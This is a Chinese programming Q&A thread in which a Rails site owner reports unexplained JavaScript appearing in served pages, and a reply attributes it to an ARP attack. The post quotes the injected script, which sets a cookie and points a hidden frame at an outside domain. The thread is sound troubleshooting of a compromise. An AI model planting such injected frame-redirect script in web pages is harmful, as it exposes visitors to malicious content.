weixin_42319174 2009-07-11 16:34
浏览 210
已采纳

ror程序疑被植入恶意代码

环境:linux+lighttpd+fastcgi+ruby on rails(ruby 1.8.6 p279,rails 2.0.2)
在服务器上部署后,打开网页,发现在浏览器下方出现一个frame框,浏览源代码,发现一段新加的JS代码,链接到一个站长统计的网站,程序代码检查过没有被修改,不知道是否是服务器有漏洞被攻击了还是什么原因,有人有类似的经历或者哪位大侠告知一下原因和解决方法,不胜感激!
[b]问题补充:[/b]
恶意代码如下:


function showme() { var CK=document.cookie; var sa=CK.indexOf("CK"); if(sa!=-1){}else{var EP=new Date(); EP.setTime(EP.getTime()+24*60*60*1000); document.cookie="CK=test;expires="+EP.toGMTString(); self.hi.location="http://benpao2020.com/aa/a2.htm?1";} }





我对ARP攻击不甚了解,不知道有什么解决方法没有,感谢不吝赐教!

  • 写回答

3条回答 默认 最新

  • qichunren 2009-07-13 11:43
    关注

    解决了arp,恶意代码就会没有了。

    本回答被题主选为最佳回答 , 对您是否有帮助呢?
    评论
查看更多回答(2条)

报告相同问题?

悬赏问题

  • ¥15 程序不包含适用于入口点的静态Main方法
  • ¥15 素材场景中光线烘焙后灯光失效
  • ¥15 请教一下各位,为什么我这个没有实现模拟点击
  • ¥15 执行 virtuoso 命令后,界面没有,cadence 启动不起来
  • ¥50 comfyui下连接animatediff节点生成视频质量非常差的原因
  • ¥20 有关区间dp的问题求解
  • ¥15 多电路系统共用电源的串扰问题
  • ¥15 slam rangenet++配置
  • ¥15 有没有研究水声通信方面的帮我改俩matlab代码
  • ¥15 ubuntu子系统密码忘记